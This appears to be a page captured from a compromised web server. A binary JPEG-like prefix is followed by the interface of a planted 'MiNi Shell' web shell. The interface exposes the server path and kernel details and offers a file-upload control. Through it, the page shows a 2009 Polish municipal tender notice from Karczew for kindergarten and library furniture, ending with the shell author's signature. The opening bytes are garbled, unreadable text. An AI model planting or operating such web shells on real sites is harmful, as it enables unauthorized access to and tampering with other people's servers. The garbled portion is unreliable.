JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090818/135029-N-2009.html

<p class="kh_header"><b>Karczew: ZP-341-1-14-09 Dostawa i montaż mebli oraz dostawa i montaż wyposażenia sanitariatów stanowiących wyposażenie budynku przy ul. Ks. Bp. Wł. Miziołka w Karczewie.</b><br>
<b>Numer ogłoszenia: 135029 - 2009; data zamieszczenia: 18.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Karczew z siedzibą w Karczewie , ul. Warszawska 28, 05-480 Karczew, woj. mazowieckie, tel. 022 7806516, faks 022 7806536.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.karczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP-341-1-14-09 Dostawa i montaż mebli oraz dostawa i montaż wyposażenia sanitariatów stanowiących wyposażenie budynku przy ul. Ks. Bp. Wł. Miziołka w Karczewie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż mebli oraz dostawa i montaż wyposażenia sanitariatów stanowiących wyposażenie budynku przy ul. Ks. Bp. Wł. Miziołka w Karczewie. Dostawa i montaż stanowi pierwsze wyposażenie budynku dla placówek w nim się mieszczących tj.: Gminnego Przedszkola nr 3 oraz Miejsko Gminnej Biblioteki Publicznej w Karczewie.
Zamawiający w przedmiotowym postępowaniu przewidział pięć niżej wymienionych części zamówienia:
Część I:
Lp	Część Nr I (dostawa i montaż) - MEBLE  BIUROWE	ilość   szt
1.	Biurko dla nauczyciela					4
2.	Regały							3
3.	Regały narożne						2
4.	Stół konferencyjny składany					2
5.	Stół kwadratowy						2
6.	Biurko proste						1
7.	Biurko							2
8.	Regał biurowy A						2
9.	Regał biurowy B						6
10.	Regały biblioteczne						8
11.	Stojek na mapy						1
12.	Szafa ubraniowa						6
13.	Drabinka przyścienna podwójna				1
14.	Drabinka przyścienna pojedyńcza				1
15.	Stoliki pod komputery					6
16.	Stolik komputerowy					1
17.	Stolik komputerowy dla dzieci				4
18.	Szafka wysoka A				                          4
19.	Szafka z półkami odkryta A				             3
20.	Szafka z półkami odkryta B			              	3
21.	Szafka z półkami odkryta C				           10
22.	Szafka wysoka B					             4
23.	Szafka na telewizor					4
24.	Słupek ekspozycyjny					1

Część II:
Lp	Część Nr II (dostawa i montaż) - MEBLE PRZEDSZKOLNE	ilość szt
1.	Stoliki dziecięce prostokątne					4
2.	Stoliki dziecięce kwadratowe					3
3.	Leżaki - łóżeczka dziecięce					25
4.	Wózek na łóżeczka dziecięce					2
5.	Kącik na książki i gry					4
6.	Kącik zabaw - zlewozmywak					2
7.	Kącik zabaw -  kuchnia A					2
8.	Kącik zabaw - kuchnia B					2
9.	Kącik ekologiczny						4
10.	Kącik plastyczny A:					2
11.	Kącik plastyczny B:					2
12.	Suszarka na prace plastyczne				4
13.	Kącik dla lalek - wypoczynkowy				2
14.	Fotelik do kącika wypoczynkowego				2
15.	Stolik do kącika wypoczynkowego				2
16.	Zestaw wypoczynkowy					2
17.	Szafka z półkami, kolorowymi szufladami, pojemnikami A             1
18.	Szafka z półkami, kolorowymi szufladami, pojemnikami B	             1
19.	Szafka z półkami, kolorowymi szufladami, pojemnikami C	             2
20.	Szafka z głębokimi kolorowymi szufladami			4
21.	Szafka z kolorowymi szufladami głębokimi i płytkimi		2
22.	Aplikacje do mebli przedszkolnych				12
23.	Półka na pacynki						4
24.	Szatnia dla dzieci A					4
25.	Szatnia dla dzieci B					16

Część III:
Lp	Część Nr III (dostawa i montaż) - MEBLE METALOWE	ilość  szt
1.	Regały metalowe jednostronne			12
2.	Regały metalowe dwustronne			12
3.	Półki dodatkowe do regałów metalowych		36
4.	Sejf gabinetowy					1
5.	Szafa metalowa na dokumenty			1
6.	Szafa gospodarcza					4
7.	Szafka na klucze					1
8.	Szafka na klucz ewakuacyjny			3
9.	Regał magazynowy					8
10.	Szafki apteczne wiszące				6
11.	Wieszak wolnostojący na ubrania			6

Część IV:
Lp	Część Nr IV (dostawa i montaż) - KRZESŁA	        ilość        szt
1.	Ergonomiczne krzesła obrotowe na kółkach z podłokietnikami	2
2.	Krzesło - fotel obrotowy					4
3.	Krzesło tapicerowane					26
4.	Krzesło z siedziskiem i oparciem z plastiku			15
5.	Krzesełka dla dzieci 26					20
6.	Krzesełka dla dzieci 31					10


Część V:
Lp	Część Nr V (dostawa i montaż) - WYPOSAZENIE SANITARNE ilość  szt
1.	Poręcz prosta						1
2.	Poręcz uchylna z uchwytem na papier toaletowy		1
3.	Dozownik mydła w płynie.					2
4.	Pojemnik na pojedyncze ręczniki papierowe.			2
5.	Pojemnik na papier toaletowy.				2
6.	Kosz na odpady otwierany przyciskiem pedałowym.		2
7.	Dozownik mydła w płynie.					15
8.	Pojemnik na ręczniki papierowe w rolach.			2
9.	Kosz na odpady z zamykaną pokrywą.				15
10.	Pojemnik na papier toaletowy.				16
11.	Lustro.							8
12.	Wieszak do luster.						16

Wraz z Formularzem Oferty należy załączyć: dokumenty i oświadczenia wymagane postanowieniami pkt 5 SIWZ, dowód wniesienia wadium, obliczenie ceny ofertowej - sporządzone na podstawie formularza stanowiącego załącznik nr: 12, 13, 14, 15, 16 do SIWZ - dotyczy części I, II, III, IV, V zamówienia (odpowiednio), rysunki, zdjęcia lub wizualizacje oferowanych elementów wyposażenia - dotyczy części I, II, III, IV, V zamówienia (odpowiednio), w przypadku składania przez Wykonawcę oferty częściowej (na dowolnie wybraną przez siebie część zamówienia) oświadczenia lub dokumenty określone w pkt 5 SIWZ Wykonawca może złożyć w jednym egzemplarzu (na dowolnie wybraną przez siebie część zamówienia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.15.50.00-3, 39.15.00.00-8, 39.13.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> - dla Części I - 460,00 zł, 
- dla Części II - 582,00 zł, 
- dla Części III - 589,00 zł, 
- dla Części IV - 133,00 zł, 
- dla Części V - 107,00 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5. udokumentują, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania  o udzielenia zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali min. jedno (1) zamówienie polegające na dostawie mebli o wartości zamówienia nie mniejszej niż 5.000 zł (słownie: pięć tysięcy złotych) brutto. Spełnienie ww. warunku Zamawiający oceniał będzie na podstawie załączonego do oferty wykazu, określonego w pkt 5.1.4. SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 6 do SIWZ i przedłożonych dokumentów potwierdzających, że ww. dostawy zostały wykonane z należytą starannością.
Opis sposobu dokonywania ceny spełniania warunków udziału w postępowaniu.
Spełnienie warunków należy potwierdzić poprzez złożenie stosownych dokumentów i oświadczeń, o których mowa w punkcie 5 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Na potwierdzenie spełnienia warunków udziału w postępowaniu należy załączyć:
1.1. Wypełnione i podpisane oświadczenie Wykonawcy, że nie podlega wykluczeniu na  podstawie art. 24 ust. 1 i ust. 2 ustawy Pzp  - załącznik nr 3 do SIWZ,
1.2. Wypełnione i podpisane oświadczenie Wykonawcy o spełnieniu warunków określonych        w  art. 22 ust. 1 pkt 1-3 ustawy Pzp  - załącznik nr 4 do SIWZ,
1.3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji   działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.4. Wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania            o udzielenia zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zamówień, opracowany według wzoru stanowiącego załącznik nr 6 do SIWZ wraz z dokumentami potwierdzającymi, iż dostawa została wykonana z należytą starannością.
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej. Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu wymienionego w pkt 1.3., składają dokument zgodnie z przepisami rozporządzenia wykonawczego do ustawy Pzp w sprawie rodzajów dokumentów jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Rozporządzenie Prezesa Rady Ministrów z dnia 16.10. 2008 r.).
3. Zasady składania oferty przez podmioty występujące wspólnie: Oferta musi być podpisana przez wszystkie podmioty lub pełnomocnika. Wymagane oświadczenia i dokumenty wskazane w pkt. 1.1., pkt 1.3., winny być złożone przez każdy podmiot..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.karczew.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Karczew z siedzibą w Karczewie ul. Warszawska 28, 05-480 Karczew - koszt 15 PLN.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2009 godzina 10:00, miejsce: Gmina Karczew z siedzibą w Karczewie ul. Warszawska 28, 05-480 Karczew, Biuro Obsługi Mieszkańców (parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com